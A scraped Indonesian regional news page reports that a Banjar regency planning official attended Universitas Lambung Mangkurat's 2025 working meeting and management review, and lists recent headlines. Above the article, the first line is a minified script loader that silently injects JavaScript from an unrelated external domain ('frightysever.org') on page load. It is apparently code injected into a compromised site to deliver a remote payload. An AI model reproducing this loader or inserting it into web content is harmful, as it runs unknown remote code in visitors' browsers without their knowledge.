(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Bappedalitbang Hadiri Raker dan Tinjauan Manajemen ULM Tahun 2025


KANALKALIMANTAN.COM, MARTAPURA – Sekretaris Bappedalitbang Kabupaten Banjar, Hanafi, menghadiri Pembukaan Rapat Kerja (Raker) dan Tinjauan Manajemen Universitas Lambung Mangkurat (ULM) Tahun 2025 yang digelar di Hotel Novotel Banjarbaru pada Rabu (19/2/2025).

Acara ini dibuka secara resmi oleh Rektor ULM, Prof. Ahmad Alim Bachri, dengan mengusung tema “Tingkatkan Koordinasi, Kolaborasi, dan Sinergitas dalam Upaya Pencapaian Target Kinerja untuk Mewujudkan ULM sebagai Perguruan Tinggi Berkelas Dunia”.

Dalam kesempatan terpisah, Hanafi menyampaikan apresiasi atas terselenggaranya kegiatan yang digelar oleh ULM tersebut. Menurutnya, Raker dan Tinjauan Manajemen ULM menjadi momentum penting dalam menyelaraskan visi dan strategi pembangunan pendidikan tinggi, khususnya dalam mendukung kemajuan daerah.

“Kami sangat mendukung langkah ULM dalam meningkatkan koordinasi dan sinergitas, karena ini juga berkaitan erat dengan pengembangan daerah.

Harapannya, dengan semakin kuatnya kerja sama antara pemerintah daerah khususnya Kabupaten Banjar dan perguruan tinggi, kita bisa mewujudkan pembangunan yang lebih inovatif dan berbasis riset di daerah,” ujar Hanafi.

Lebih lanjut, dia berharap hasil dari Raker tersebut dapat memberikan arah yang lebih jelas bagi ULM dalam mencapai target kinerja yang telah ditetapkan, serta memperkuat peran akademisi dalam memberikan solusi terhadap berbagai tantangan pembangunan khususnya di Kabupaten Banjar dan Kalimantan Selatan secara umum.

Selain Bappedalitbang Kabupaten Banjar, acara tersebut dihadiri oleh jajaran pimpinan ULM, perwakilan instansi pemerintah, serta berbagai pihak yang memiliki keterkaitan dalam pengembangan pendidikan tinggi di wilayah Kalimantan Selatan.

Dengan adanya sinergi yang semakin erat, ULM diharapkan mampu makin berdaya saing, baik di tingkat nasional maupun internasional.(kanalkalimantan.com/bappedalitbang/kk)

Reporter: kk
Editor: Dhani


Muhammad Andi

Recent Posts

Pascabanjir TurunTangan Banjarmasin – UPZ Bakti Bersama Salurkan Bantuan ke Masjid

KANALKALIMANTAN.COM, PARINGIN — Banjir bandang di Kecamatan Tebing Tinggi, Kabupaten Balangan, beberapa waktu lalu tak… Read More

13 jam ago

Mantan Kajari HSU Ajukan Praperadilan, KPK Siap Ladeni Gugatan

KANALKALIMANTAN.COM, JAKARTA - Komisi Pemberantasan Korupsi (KPK) menyatakan siap menghadapi gugatan praperadilan yang diajukan mantan… Read More

17 jam ago

Hari Gizi Nasional 2026 “Sehat Dimulai dari Piringku”

KANALKALIMANTAN.COM - Hari Gizi Nasional yang diperingati setiap tanggal 25 Januari merupakan momentum penting dalam… Read More

20 jam ago

Wali Kota Yamin akan Tindak Pemilik Ruko yang Tidak Merawat Drainase

KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin H Muhammad Yamin HR menegaskan akan menindak pemilik Ruko… Read More

1 hari ago

Ketua DPRD Kalsel Sampaikan Tuntutan Mahasiswa ke Senayan

KANALKALIMANTAN.COM, JAKARTA — Ketua DPRD Kalimantan Selatan (Kalsel), H Supian HK menyampaikan tuntutan mahasiswa dari… Read More

1 hari ago

275 ASN Pemko Banjarmasin Pensiun di 2025

KANALKALIMANTAN.COM, BANJARMASIN — Sebanyak 275 Aparatur Sipil Negara (ASN) di lingkungan Pemerintah Kota (Pemko) Banjarmasin… Read More

2 hari ago

This website uses cookies.